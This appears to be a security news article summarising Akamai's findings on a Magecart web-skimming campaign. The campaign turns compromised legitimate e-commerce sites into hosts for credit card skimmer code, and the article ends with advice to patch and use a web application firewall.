Akamai researchers have spotted a new credit card skimming campaign that hijacks legitimate websites to use them as “makeshift” command-and-control servers and host malicious code, unbeknownst to the victims.
Web security company said it identified victims in North America, Latin America, and Europe, with some of them estimated to have hundreds of thousands of visitors per month, potentially putting tens of thousands of shoppers’ PII and credit cards at risk of being stolen and abused or sold on the dark web.
The primary objective of a Magecart attack is to steal personally identifiable information (PII) and credit card details from the checkout pages of digital commerce websites. In this recent campaign threat actors have been observed exploiting sites running Magento, WooCommerce, WordPress, and Shopify digital commerce platforms.
“Rather than using the attackers’ own C2 server to host malicious code, which may be flagged as a malicious domain, attackers hack into (using vulnerabilities or any other means at their disposal) a vulnerable, legitimate site, such as a small or medium-sized retail website, and stash their code within it. In this way, the attackers create a seemingly healthy host for their malicious code, and can deliver it to any victim they choose,” the researchers explained in a blog post.
It’s currently unclear how the threat actors breached the sites, possibly they gained access via vulnerabilities in the targeted e-shops.
In some cases, the targeted websites were abused twice - for hosting malicious code and as an object of a web skimming attack.
“Not only were they compromised and subjected to data theft by the injected code, but they also unwittingly served as a vehicle for spreading the skimmer's malicious activities to other vulnerable websites,” Akamai said.
The attack chain starts with the threat actors scanning the web for vulnerable legitimate sites and hacking them to inject malicious code. The attackers use small JavaScript code snippets that act as loaders to fetch the final software skimmer from the victims’ websites previously compromised
The researchers found two distinct variations of the skimmer code employed in the observed campaign.
The first skimmer code is a heavily obfuscated version that contains a list of CSS selectors which explicitly indicated that the skimmer targeted input fields responsible for capturing PII and credit card details.
The second variation of the skimmer was less obfuscated and contained certain contained indicators that allowed Akamai identify additional victims.
To plant a web skimmer, attackers will need to get initial access to the server either by exploiting a vulnerability or by abusing one of the existing third-party scripts, so organizations are advised to keep up with the most recent patches and complement them by implementing a Web Application Firewall (WAF) solution.